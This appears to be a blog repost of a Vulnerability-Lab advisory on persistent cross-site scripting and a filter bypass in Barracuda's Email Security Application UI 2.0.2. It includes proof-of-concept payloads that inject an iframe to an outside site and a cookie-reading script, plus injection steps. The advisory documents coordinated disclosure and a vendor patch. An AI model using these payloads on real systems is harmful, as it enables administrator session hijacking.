through h4x0r3d's eyes

Vulnerability-Lab has discovered A filter bypass vulnerability & 2 persistent input validation vulnerabilities in Barracudas EMail Security Application UI v2.0.2.

The vulnerability allows an attacker (remote) to bypass the input validation & exception handling to inject or display own malicious persistent context on application side (persistent).

The vulnerabilities are located in the Domain Settings > Directory Services > LDAP Host module with the vulnerable bound name parameter. The secound persistent vulnerability is located in the reports module with the bound vulnerable parameters start date & end date.

 Exploitation requires low user inter action & privileged application user account. Successful exploitation of the vulnerability can lead to session hijacking (admin) or stable (persistent) context manipulation.

Vulnerability-Lab provide us the proof-of-concept for the two vulnerabilities.  Here it is:

POC for First Vulnerability:

Review: Domain Settings > Directory Services > LDAP Host

<div id=“directory-services” class=“module”>
<h4 class=“module-title”>Directory Services</h4>
<div class=“module-content”>
<div class=“warn notice” id=“ldap-test-result” style=“”><img src=“/images/spinner1.gif”
alt=“loading…”> Connecting to >“<iframe src=”http://global-evolution.info“>@gmail.com >”<script>alert(document.cookie)</script><div style=“1@gmail.com 0</iframe></div>
<div style="float: right;”>
<a href=“https://ess.barracudanetworks.com/domains/sync_ldap/4&quot; class="btn”><span><span>Synchronize Now</span></span></a>
<a href=“#” class=“btn” id=“ldap-test-btn”><span><span>Test Settings</span></span></a>
</div>
<p class=“field”>
<label class=“label” for=“ldap_host”>LDAP Host:</label>
<input name=“ldap_host” id=“ldap_host” size=“30” value=“>
”<iframe src=http://global-evolution.info>@gmail.com >“<script>alert(document.cookie)</script><
div style=”1@gmail.com 0" type=“text”>

URL: https://ess.127.0.0.1:1338/domains/info/4

PoC: >“>”<iframe src=http://global-evolution.info>VL >“<div style="1 >”>“

Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (>”) will be bypassed and the string will be executed out of the secure exception handling message.

POC for second vulnerability :
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce …

Vulnerable Module: Reports > Date Start > Date End

PoC: >“<iframe src=http://global-evolution.info&gt;

URL: https://ess.127.0.0.1:1338/reports

Note:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.

2012-06-20: Researcher Notification & Coordination
2012-06-23: Vendor Notification
2012-07-01: Vendor Response/Feedback
2012-07-24: Vendor Fix/Patch
2012-08-01: Public or Non-Public Disclosure

Researcher estimate the vulnerability risk level as medium . Vulnerability-Lab informed about the vulnerability to official vendor, They successfully patched the vulnerability and released BESS version 2.04.